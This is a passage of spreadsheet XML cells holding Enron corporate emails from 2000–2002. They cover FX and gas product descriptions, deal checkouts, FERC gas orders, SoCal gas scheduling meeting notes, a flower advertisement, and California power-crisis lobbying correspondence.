   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8z7__x000D_
_x000D_
Umana v. Swidler &amp; Berlin Chtd. (U.S.) . . . Page E-5_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8z2__x000D_
_x000D_
Wang v. New York City Dep't of Fin. (U.S.) . . . Page E-4_x000D_
   http://pubs.bna.com/ip/BNA/dlr.nsf/id/a0a4j6f8x7__x000D_
_x000D_
   ___________x000D_
   Daily Labor Report (ISSN 1522-5968) Highlights are_x000D_
   published daily by The Bureau of National Affairs, Inc.,_x000D_
   1231 25th St., NW, Washington, DC 20037._x000D_
_x000D_
   For account information and changes, contact_x000D_
   1-800-372-1033 (M-F, 8:30 am-7:00 pm ET)_x000D_
_x000D_
   To request retransmission or to order a copy of the_x000D_
   summarized article, contact 1-800-452-7773 or e-mail_x000D_
   bnaplus@bna.com._x000D_
_x000D_
   For copyright guidelines, go to_x000D_
   http://www.bna.com/corp/copyright._x000D_
_x000D_
   Copyright (c) 2001 by The Bureau of National Affairs,_x000D_
   Inc.  Washington, D.C.  20037.  Use of this service is_x000D_
   subject to the terms and conditions of the license_x000D_
   agreement with BNA.  Unauthorized access or distribution_x000D_
   is prohibited.</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 08:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Sara, please disregard the email that I sent you about the Product Long _x000D_
Description. Either Carlos or myself will get the correct Long Descriptions _x000D_
to you tomorrow. I appologize for any inconvenience that I may have caused._x000D_
Regards_x000D_
jr_x000D_
---------------------- Forwarded by Justin Rostant/HOU/ECT on 02/27/2001 _x000D_
03:32 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Justin Rostant                                                         _x000D_
    02/21/2001 10:05 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FX Currency Long Descriptios_x000D_
_x000D_
Sara, attached you will find the Product Long Descriptions for the FX _x000D_
products._x000D_
 If you have any questions call me at 3-6460_x000D_
jr_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Justin Rostant/HOU/ECT on 02/21/2001 _x000D_
09:58 AM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Carlos Alatorre @ ENRON                                                _x000D_
             02/21/2001 09:32 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Justin.Rostant@enron.com_x000D_
cc:  _x000D_
Subject: LME last change_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Carlos Alatorre/NA/Enron on 02/21/2001 _x000D_
09:35 AM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Carlos Alatorre                                                        _x000D_
     02/21/2001 09:14 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: sara.shackleton@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: LME last change_x000D_
_x000D_
Sara,_x000D_
Please find attached your approved document with a last minute change, please _x000D_
take a look and let us know if you are OK with it._x000D_
Also, you can find the GTC disclaimer (essentially the same as for all _x000D_
internal products)_x000D_
_x000D_
Please let us know your approval or comments. I'll  really appreciate your _x000D_
prompt response since, as mentioned, we need to have both documents ready on _x000D_
the system by noon today in order to have them uploaded into the database and _x000D_
ready for trading next Monday,_x000D_
_x000D_
Thank you_x000D_
Carlos_x000D_
x5-8075_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 12-7-00 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kate,_x000D_
_x000D_
ref 476601_x000D_
Tom Alonso_x000D_
Prebon shows this deal as Enron buying and Morgan selling_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                12/07/2000 05:10 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 12-7-00 Checkout  _x000D_
_x000D_
Mike is entering that deal right now. I'll get back to you with the deal _x000D_
number._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 12:07:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.wolfe@enron.com', 'benjamin.woods@enron.com', 'jaime.gualy@enron.com', 'grace.kim@enron.com', 'iris.mack@enron.com', 'cory.willis@enron.com', 'randy.katz@enron.com', 'andy.pace@enron.com', 'rika.imai@enron.com', 'jason.kaniss@enron.com', 'michael.roan@enron.com', 'gulay.soykok@enron.com', 'lloyd.will@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'hicham.benjelloun@enron.com', 'harry.arora@enron.com', 'andrew.kandolha@enron.com', 'd..thomas@enron.com', 'preston.ochsner@enron.com', 'seung-taek.oh@enron.com', 'anna.santucci@enron.com', 'todd.decook@enron.com', 'peter.makkai@enron.com', 'kelly.holman@enron.com', 'steve.gim@enron.com', 'jeffrey.wilson@enron.com', 'john.grace@enron.com', 'steve.wang@enron.com', 'moises.benchluch@enron.com', 'david.ryan@enron.com', 'vikas.dwivedi@enron.com', 'joseph.wagner@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">NOTE NEW LOCATION 49C4_x000D_
_x000D_
_x000D_
_x000D_
1. Weather Update_x000D_
_x000D_
2.  AGA_x000D_
_x000D_
3. Technical Analysis Part 2_x000D_
_x000D_
_x000D_
Following Week_x000D_
_x000D_
July 24 - Environmental Regulation  - Current Air Quality Regulations Impacting the Power Sector_x000D_
_x000D_
July 31- Oil   Vikas Dwivedi_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 11:55:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bill.williams@enron.com', 'ray.alvarez@enron.com', 'matt.motley@enron.com', 'tom.alonso@enron.com', 'sean.crandall@enron.com', 'mark.guzman@enron.com', 'dave.fuller@enron.com', 'susan.mara@enron.com', 'steve.swain@enron.com', 'mike.swerzbin@enron.com', 'tim.belden@enron.com', 'm..driscoll@enron.com', 'mark.fisher@enron.com', 'timothy.heizenrader@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>Gas Talk</t>
  </si>
  <si>
    <t xml:space="preserve">Traders et al:_x000D_
_x000D_
Recently you've seen and will continue to see news in the press about FERC inquiries into natural gas prices at the California border and the West:_x000D_
_x000D_
1. On Thursday, 24 May 01, FERC will be holding a technical conference in Washington DC on natural gas transportation infrastructure.  Enron will be making comments at that conference emphasizing that only increased supply or decreased demand will bring prices down._x000D_
_x000D_
2. Yesterday, FERC released an inquiry into whether it should re-impose the as-billed cap on short-term (less than 1 year) releases of transportation capacity.  FERC is considering re-imposing the cap in the entire WSCC, not just California.  Enron's view (which it will present in formal comments due in 20 days) is that re-imposing the cap will do nothing to affect the California border price as it is driven by supply-demand fundamentals.  However, you will likely see claims that reimposing the cap will bring rate relief to gas customers, including EG customers.  Attached is a copy of this latest FERC inquiry._x000D_
_x000D_
If you have any question, please contact me._x000D_
_x000D_
Alan Comnes _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
:	FERC Gas Orders Issued 5/22_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Regulatory Affairs Committee_x000D_
       Power Marketers Working Group_x000D_
_x000D_
FROM: Jim Steffes, Regulatory Affairs Committee Chair_x000D_
            Bob Reilley, Power Marketers Working Group Chair_x000D_
            Julie Simon, Vice President of Policy_x000D_
            Mark Bennett, Senior Manager of Policy_x000D_
            Erin Perrigo, Manager of Policy_x000D_
_x000D_
DATE: May 23, 2001_x000D_
_x000D_
RE: FERC Gas Orders Issued 5/22_x000D_
_x000D_
Late yesterday FERC issued two gas orders, which are attached. In the San Diego Gas and Electric/LADWP Order the Commission requests comments on whether it should reimpose the maximum rate ceiling on short term capacity release transactions into California.  The second is a more detailed notice of the schedule for tomorrow's staff technical conference on California Natural Gas Transportation Infrastructure.  We will discuss possible EPSA responses to the request for comments on our weekly conference call and the Gas Issues Working Group on June 7th.  If you have any questions, please call Julie Simon at EPSA (202-628-8200 or jsimon@epsa.org)._x000D_
_x000D_
Attachment_x000D_
_x000D_
 - pl01-4.00a.doc _x000D_
 - rp01-180.00z.doc </t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:39:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'p..south@enron.com', 'frank.ermis@enron.com', 'daniel.lisk@enron.com', 'k..allen@enron.com', 'mike.grigsby@enron.com', 'barry.tycholiz@enron.com', 'kim.ward@enron.com', 'l..gay@enron.com', 'matt.smith@enron.com', 'jeff.dasovich@enron.com', 'jay.reitmeyer@enron.com', 'patti.sullivan@enron.com', 'keith.holst@enron.com', 'tori.kuykendall@enron.com', 'leslie.lawner@enron.com', 'matthew.lenhart@enron.com', 'shannon.groenewold@enron.com', 'stephanie.miller@enron.com', 'w..cantrell@enron.com'})</t>
  </si>
  <si>
    <t>Socal Window Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a summary of my notes at the Socal meeting regarding revised window procedures.  No hand-outs were provided._x000D_
_x000D_
Calculation of Receipt Point Capacity_x000D_
Topock  540 mmcf/d_x000D_
Ehrenberg 1250 mmcf/d_x000D_
Needles 800 mmcf/d_x000D_
Wheeler 800 mmcf/d_x000D_
_x000D_
New Receipt Points_x000D_
Kramer Junction 200 mmcf/d_x000D_
Hector Rd 50 mmcf/d_x000D_
Both will be available around Feb 1_x000D_
_x000D_
Basis of Pro-Ration-Current Windows Calculation_x000D_
Currently, Gas Control provides total receipt point capacity comprised of demand forecast and injection capability and compares to maximum amount of gas that can enter system.  Gas Select prorates interstate's receipt capacity based on prior day's nominations._x000D_
_x000D_
New Calculation, Changes and Display_x000D_
Based on operational maximum with adjustments for maintenance.  SoCal ist aking and applying the current formula for Wheeler Ridge to all the points.  Any changes to operational maximum will probably be due to maintenance and posted on Gas Select.  Customer will choose which points it wants to reduce receipts.  Operating maximums will equal demand forecast plus injections.  Demand forecast will rely on Gas Control weather forecast.  They use Weather Bank as one of their tools._x000D_
_x000D_
OFO Declaration_x000D_
Name changes from overnomination_x000D_
Can declare before any Cycle_x000D_
Provide 2 hour notice_x000D_
Post on Gas Select_x000D_
Show OFO Calculation on Gas Select_x000D_
_x000D_
Windows_x000D_
Reason to set windows was to set limits to prevent too much gas from coming into system_x000D_
Calculation based on noms which does not work well.  Lots of complaints.   People were complaining that it restricted access to the system.  Eliminating point specific calculation.  Open system to Max Oper. Limits or Contractual Limits.   Will continue to operate Wheeler Ridge under Aug 1 procedures.  No changes to Wheeler Ridge.   _x000D_
Due to the need to maintain operational control, an OFO will be declared when scheduled volumes are greater than the max operating capacity on any cycle.  _x000D_
Replace windows with operational maximum volumes.  If  CPUC approves comprehensive settlement, will post 5 days of information to anticipate OFO's_x000D_
Now customers will elect which point they will back off instead of using windows._x000D_
_x000D_
Scheduling Changes-Nov 1_x000D_
Gas Select is being rebuilt and will be an internet system in mid-2002 .  No direct dial-up.     _x000D_
Rollover noms-noms will be copied from cycle to cycle_x000D_
Copy confirmed noms_x000D_
All noms will be rolled over-will not be at discretion of 3rd party.  However, can still make  changes.  Can still upload new files._x000D_
_x000D_
2 Hour Notice_x000D_
Socal will provide 2 hour notice on  Gas Select of OFO.  Other methods include leaving message on Socal Hotline (213-244-3900) and list of e-mail messages that can go directly to pagers.  Gas Select is official notification.  Courtesy notification is hot line and e mail.  Gas Select is a subscriber- based system mandated by CPUC and must get regulatory change to make free._x000D_
OFO's are going to be system wide and not customer specific.  OFO's can be declared intraday.  Once OFO declared, it will be kept for entire day.  Concerned that if call off, will have to put back on.  Don't want to go back and forth.  This decision may be reconsidered once they see how it works.  Many times Socal see an increase of 200 mmcf/day between Cycle 3 and 4 so they are concerned.  _x000D_
_x000D_
Scheduled vs. Capacity-Declare OFO_x000D_
Nominations may not exceed 110% of expected usage.  _x000D_
Expected Usage is defined as usage for the same day for the prior week.  Can revise expected usage._x000D_
No interruptible storage injections allowed during OFO._x000D_
Use Elapsed Pro-Rata Rules_x000D_
Expected Usage-cut nominations to 110% of expected usage so will use same day  of the prior week as proxy.  Generators need to revise expected usage.  Acceptance of changes are at the discretion of SoCal._x000D_
Flow Day Diversions don't go into effect until after Cycle 4.  Gas Control will determine if flow day diversion will be allowed.  _x000D_
If call OFO after cycle 3 or 4 and have interruptible storage injections, such storage will be prorationed back under the elapsed prorata rules._x000D_
Many people were concerned that interruptible storage will be severely compromised.  _x000D_
If OFO called , Interruptible Storage could be cut under the elapsed prorata rules as follows:_x000D_
_x000D_
Cycle 1    Nom 1000  ; 0 cut_x000D_
Cycle 2 Nom 1000; 666 cut_x000D_
Cylce 3 Nom 1000; 500 cut_x000D_
Windows will only be implemented during cycle 4 if OFO callled after cycle 3 and no improvement is realized.  Will allocate prorata.  Will use latest scheduled volume and will pro rate by receipt point.  In other words, if OFO declared during Cycle 1 and no relief after 3 cycles, Socal will window Cycle 4 and prorata cut. Parties will determine what gets cut on all the other cycles. For penalty purposes, actual burn from 12 o'clock to 12 o'clock will be used to calculate penalties or MAXDQ if not metered.  _x000D_
For OFO, assume supply delivereis day before and burn is the same day for the prior week.  Declare OFO on prior day's scheduled volume._x000D_
_x000D_
For an evening declaration-will use most recent available scheduled volumes.  For example:_x000D_
_x000D_
         Flow Day 10/4                10/3 Scheduled Volumes_x000D_
Cycle 1                                    Cycle 2_x000D_
Cycle 2                                     Intraday 1_x000D_
Cycle 3				evening cyle 2 on 10/4_x000D_
Cycle 4                                     Intraday 1 on 10/4_x000D_
_x000D_
In other words, will look at evening cycle 2 scheduled volumes on the 3rd for declaring OFO on cycle 1 for the 4th.; look at intra day 1 for the 3rd in declaring OFO for cycle 2 on the 4th;  look at evening cycle 2 on 10/4 in declaraing OFO for Cycle 3 on the 4th;  look at intraday 1 on the 4th in declaraing OFO on cycle 4 for the 4th._x000D_
_x000D_
Winter Balancing Rules_x000D_
Effective Nov 1-March 31_x000D_
No changes._x000D_
All customers must comply._x000D_
Minimum delivery requirements_x000D_
50% of daily usage over 5 day period; (Nov 1-5;6-10;)_x000D_
70% of daily usage depending on storage level_x000D_
70% daily usage implemented when storage levels equal 20 bcf above peak day min_x000D_
90% of daily usage depending on storage level_x000D_
90% rule implemented when storage levels equal 5 bcf  plus peak day min._x000D_
Look at storage graph on Gas Select.  Posted 24 hours in advance if the minimum daily is changed.  If go to 70% , current 5 day cycle must end completely, before new % goes into effect._x000D_
Must increase storage inventory by 1 bcf above the 70% before going back to 50% rule._x000D_
Once 90% rule implemented, will return to 70% as soon as operationally feasible,_x000D_
_x000D_
Contracted Marketer's customer usage and delivereies are aggregated in one balancing account._x000D_
_x000D_
Core Aggregation-subject to 50% daily throughout entire winter period based on DCQ.  _x000D_
Core-50% of daily throughput for the enitre period,; (Patrick Brown group)_x000D_
Not subject to 70% and 90% rules._x000D_
_x000D_
2 types of gas count toward daily obligation- firm storage withdrawal and flowing gas.  As-available storage and imbalance trading do not count._x000D_
_x000D_
Burn=measured daily usage thru electronic measurement,_x000D_
Min DQ-used if customer does not have electronic measurement._x000D_
_x000D_
Customer assessed  GIMB charge if total deliveries is less than 50% of total burn over 5 day period.  Customer purchases gas at daily balancing stand-by rate under  G IMB Rate Schedule which is 150% of highest Socal Border price per NGI Gas Daily plus franchise fees and other charges.  Rate is posted at end of every month._x000D_
_x000D_
_x000D_
OFO can be declared during undernom season (winter season)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 09:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.lindsay@enron.com', 'claudia.clark@enron.com', 'enron.counterparty@enron.com', 'paul.maley@enron.com', 'trang.le@enron.com', 'david.hardy@enron.com', 'william.bradford@enron.com', 'kelly.lombardi@enron.com', 'lisa.lees@enron.com', 'tanya.rohauer@enron.com', 'cynthia.clark@enron.com', 'juana.fayett@enron.com', 'stephanie.sever@enron.com', 'brant.reves@enron.com', "karen.o'day@enron.com", 'lee.munden@enron.com', 'jana.morse@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com', 'eol.center@enron.com', 'enron.facilities@enron.com', 'walter.guidroz@enron.com', 'sonya.clarke@enron.com', 'bill.hare@enron.com', 'lesli.campbell@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'tim.davies@enron.com', 'tana.jones@enron.com', 'karen.lambert@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Re: EOL approvals, 2-26-01 _ GCP Response</t>
  </si>
  <si>
    <t xml:space="preserve">GCP adjustments highlighted in red._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
(GCP_Enron Networks)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Walter Guidroz@ENRON_x000D_
02/26/2001 04:56 PM_x000D_
To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Debbie _x000D_
R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, _x000D_
Cynthia Clark/Corp/Enron@ENRON, Enron Europe Global Contracts and Facilities, _x000D_
Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, _x000D_
Tom Moran/HOU/ECT@ECT, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, _x000D_
Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, _x000D_
Sonya Clarke/LON/ECT@ECT, Lee Munden/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/HOU/ECT@ECT, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect_x000D_
cc:  _x000D_
Subject: EOL approvals, 2-26-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 2 Feb 2002 06:40:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eflowers-return-11-7-10825134-x3pacl23neeotqbz-299@mta10.optamail.com'})</t>
  </si>
  <si>
    <t>Dozen Long-Stemmed Roses</t>
  </si>
  <si>
    <t>_x000D_
You are receiving this email because you asked to be sent special offers through one of the partners of eValueMarketing. eValueMarketing only brings you the best offers on the web. However, if you wish to unsubscribe, please follow the instructions at the bottom of the email.   Valentines Day    [IMAGE]   ROSES  Order today. ORDER NOW    Beary Special  Order today. ORDER NOW   Couple  Simplicity  Whitmans    Order today. ORDER NOW   Order today  ORDER NOW     Don't forget to check out our fresh flower bouquets for Birthdays and Anniversaries.  Send flowers across town or across the country with FlowersDirect.com .  We have flowers and gifts for all your gift giving needs.  Order today.    Order online or call 1-800-335-6937.  We look forward to hearing from you.               	_x000D_
_x000D_
_x000D_
 If you don't want to get these letters anymore send a blank email 	_x000D_
_x000D_
logo</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 08:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Eric -_x000D_
_x000D_
I have just been advised that the  new Index  that you requested (as detailed _x000D_
below) is now available for you to create as a product.  _x000D_
_x000D_
Thanks for letting us work with you._x000D_
_x000D_
- Rob _x000D_
x35491_x000D_
---------------------- Forwarded by Robert B Cass/HOU/ECT on 11/27/2000 03:00 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Robert B Cass_x000D_
11/22/2000 09:41 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Melba Lozano/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT _x000D_
Subject: Re: New Product  _x000D_
_x000D_
Hi Eric -_x000D_
_x000D_
We will begin testing your index today.   The description for your index will _x000D_
read as follows:_x000D_
_x000D_
"The Index for a day shall be the Daily Midpoint price published on such _x000D_
calendar day under the heading  "Daily Price Survey" in the _x000D_
East-Houston-Katy, Katy plant tailgate section of Gas Daily, or if a calendar _x000D_
day is not a Business Day then the price used shall be the Daily Midpoint _x000D_
price published on the next suceeding Business Day. " _x000D_
_x000D_
The Product Short Description on the website will be as follows:_x000D_
_x000D_
 US Gas Daily  KatyPltTailgate  Month/Year  USD/MM_x000D_
_x000D_
_x000D_
Please advise if this does not meet with your approval._x000D_
_x000D_
Thanks - _x000D_
Rob  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           11/21/2000 12:48 PM_x000D_
	_x000D_
_x000D_
To: Robert B Cass/HOU/ECT@ECT_x000D_
cc: Dale Neuner/HOU/ECT@ECT _x000D_
Subject: New Product_x000D_
_x000D_
Rob,_x000D_
_x000D_
I need to get a new gas daily product created.  This product will be settled _x000D_
daily against the Katy Plant Tailgate under the East-Houston-Katy subheading _x000D_
in Gas Daily._x000D_
_x000D_
_x000D_
Call with questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
x3-0977_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 06:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>10/9 dpr</t>
  </si>
  <si>
    <t xml:space="preserve">??_x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 10/11/2000 11:15 AM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Ted Murphy                                                             _x000D_
10/11/2000 09:08 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Michael E Moscoso/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT _x000D_
Subject: 10/9 dpr_x000D_
_x000D_
mikedo not know if a big deal, but probably not good to have final dpr with _x000D_
#REF's in it_x000D_
ted_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 09:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: California Power Crisis</t>
  </si>
  <si>
    <t>Jeff,_x000D_
_x000D_
Thanks for this analysis. I think we would all agree that the solution to_x000D_
put power_x000D_
100% in the hand of the state is an extremely frightening proposition._x000D_
Unfortunately, it_x000D_
falls in-line with what Gov. Davis likes to do, which is to control all of_x000D_
the process himself._x000D_
I know John will not be able to digest all of this, but will brief him over_x000D_
the phone on the_x000D_
excellent arguments you make here against support for AB1X._x000D_
_x000D_
I will give you all feedback from the meetings tomorrow. Thanks for all_x000D_
your help._x000D_
_x000D_
Laura_x000D_
_x000D_
At 10:02 AM 2/14/2001 -0600, Jeff.Dasovich@enron.com wrote:_x000D_
_x000D_
&gt;Hi Laura:  I've attached three things, but first wanted to give you a bit_x000D_
&gt;of an update on events transpiring in Sacramento and at the Public_x000D_
&gt;Utilities Commission._x000D_
&gt;_x000D_
&gt;Move to Prohibit Customer Choice_x000D_
&gt;As you may know, AB1X, the bill that the Legislature recently passed and_x000D_
&gt;the Governor signed, gives the California Department of Water Resources the_x000D_
&gt;authority to buy power on behalf of the utilities.  Included in that bill,_x000D_
&gt;however, is a provision that prohibits "Direct Access,"  California's term_x000D_
&gt;for customer choice._x000D_
&gt;_x000D_
&gt;In sum, the bill, in its current form, prohibits businesses and consumers_x000D_
&gt;from chosing an alternative energy service provider, like Enron.  Our_x000D_
&gt;understanding is that the Department of Finance called for the prohibition._x000D_
&gt;Their reasoning is that they need a "captive" customer base to pay for the_x000D_
&gt;bonds that the State will issue in order to finance DWR's power purchases._x000D_
&gt;_x000D_
&gt;Customer choice was of course the foundation of California's restructuring_x000D_
&gt;law, AB 1890, and is arguably the only bright spot in an otherwise fatally_x000D_
&gt;flawed plan.  For example, the only businesses and consumers that were_x000D_
&gt;protected in San Diego when rates were deregulated last year were those_x000D_
&gt;businesses and consumers that had signed fixed price power deals with_x000D_
&gt;competitive service providers.  Ironically, the recently passed legislation_x000D_
&gt;takes choices away from consumers and diminishes their ability to manage_x000D_
&gt;their energy costs.  Before AB 1890, consumers and businesses had one_x000D_
&gt;choice--the monopoly  utility.  With the passage of AB 1X, they again will_x000D_
&gt;have one choice. But this time their only choice will be to buy from a_x000D_
&gt;government agency DWR._x000D_
&gt;_x000D_
&gt;A broad coalition of consumer groups has expressed its opposition to the_x000D_
&gt;prohibition and Senator Debra Bowen (a key player on the Senate side), and_x000D_
&gt;Fred Keeley (a key player on the Assembly side), have promised to "fix" the_x000D_
&gt;prohibition in another bill "SB27X."  I'll forward in another email the_x000D_
&gt;language that the coalition has drafted and hopes Bowen and Keeley will_x000D_
&gt;carry._x000D_
&gt;_x000D_
&gt;Unfortunately, we are now hearing rumors that the Governor intends to_x000D_
&gt;direct the California Public Utilities to immediately implement the_x000D_
&gt;provisions of AB1X prohibiting Direct Access, despite the fact that a large_x000D_
&gt;coalition of consumers and service providers are actively working with Bown_x000D_
&gt;and Keeley to amend the prohibition language._x000D_
&gt;_x000D_
&gt;It would be extremely useful if the folks participating in the meeting on_x000D_
&gt;Thursday with the Governor let him know that taking choices away from_x000D_
&gt;businesses and customers is the wrong way to go and that he and the_x000D_
&gt;legislative leaders need to work with the coalition to fix it.  You'll note_x000D_
&gt;in the language developed by the coalition that the proposal strikes a_x000D_
&gt;reasonable balance between the Dept of Finance's concerns about recouping_x000D_
&gt;DWR's costs of buying power, and the need to give consumers and businesses_x000D_
&gt;maximum flexible in managing their energy costs._x000D_
&gt;_x000D_
&gt;Move to Have the State Take Over the Electric Industry in California_x000D_
&gt;_x000D_
&gt;John Burton, the Democratic leader of the Senate, insists that, "if_x000D_
&gt;California is going to 'bail out' the utilities, the State needs to get_x000D_
&gt;something in return."  Burton wants the state to buy and operate PG&amp;E's and_x000D_
&gt;Edison's transmission system and create a state power authority that would_x000D_
&gt;get in the business of (among other things) developing, financing,_x000D_
&gt;constructing and operating power plants and natural gas pipelines.  Burton_x000D_
&gt;got both of these bills designed to take over the industry passd out of his_x000D_
&gt;committee yesterday (SB6X and SB33X).  It is unclear how much support he_x000D_
&gt;has in the full Senate or in the Assembly, but the possibility of passage_x000D_
&gt;is certainly greater than zero at this juncture._x000D_
&gt;_x000D_
&gt;Others experts are offering a better alternative.  When the federal_x000D_
&gt;government helped Chrysler out of its financial difficulties 20 years ago,_x000D_
&gt;the federal government received stock warrants in return.  Until recently,_x000D_
&gt;the Governor favored warrants, but more recently he has waivered in his_x000D_
&gt;statements regarding a state take over.  Burton appears to have negotiating_x000D_
&gt;leverage with the Governor and appears to be using it._x000D_
&gt;_x000D_
&gt;Again, it would be extremely useful for folks to let the Govenor know in_x000D_
&gt;the meetings on Thursday that a State take over of the industry is an_x000D_
&gt;extreme move and bad public policy.  I will forward to you in a separate_x000D_
&gt;email letters that we sent to Burton expressing our opposition to his bills_x000D_
&gt;and the reasons for our opposition.  In brief, there is no shortage of_x000D_
&gt;private capital ready and willing to invest in California's energy_x000D_
&gt;infrastructure (i.e., power plants, electric transmission lines, gas_x000D_
&gt;pipelines).  All California needs to do is create the investment climate_x000D_
&gt;necessary to attract the capital.  In addition, history shows that the_x000D_
&gt;State is extremely ill-equipped to become California's mega-utility._x000D_
&gt;_x000D_
&gt;Here are the attachments:_x000D_
&gt;_x000D_
&gt;    A demand buy-down proposal.  We made this proposal to the Governor (and_x000D_
&gt;    continue to propose it to policymakers in Sacramento, Washington D.C._x000D_
&gt;    and just about everywhere else).  In short, the notion is that, if the_x000D_
&gt;    market is willing to pay power producers, say, 7 cents/kwh to "produce"_x000D_
&gt;    power, then the market ought to be willing to pay businesses and_x000D_
&gt;    consumers 7 cents/kwh to "reduce" power consumption._x000D_
&gt;_x000D_
&gt;    This approach is critical for two reasons:  first, it provides_x000D_
&gt;    businesses and consumers the financial incentives necessary (and that_x000D_
&gt;    California currently lacks) to conserve energy and use energy more_x000D_
&gt;    efficiently.  Second, because California delayed identifying and_x000D_
&gt;    implementing a solution to California's energy crisis, its options for_x000D_
&gt;    addressing the severe shortages that are likely occur this summer are_x000D_
&gt;    very limited.  Reducing demand represents one of the few options that_x000D_
&gt;    can help to immediately reduce the gap between supply and demand._x000D_
&gt;    Putting financial incentives in place now to reduce demand and "free up"_x000D_
&gt;    electrons is an investment with significant payback._x000D_
&gt;_x000D_
&gt;    A "manifesto" recently released by a group of Berkeley and Stanford_x000D_
&gt;    economists and industry experts urging the Govenor to pursue a_x000D_
&gt;    "market-oriented" solution to California's energy crisis._x000D_
&gt;_x000D_
&gt;    An editorial in yesterday's Wall Street Journal by Dan McFadden, a nobel_x000D_
&gt;    prize-winning economist from Berkeley echoing the proposal advanced in_x000D_
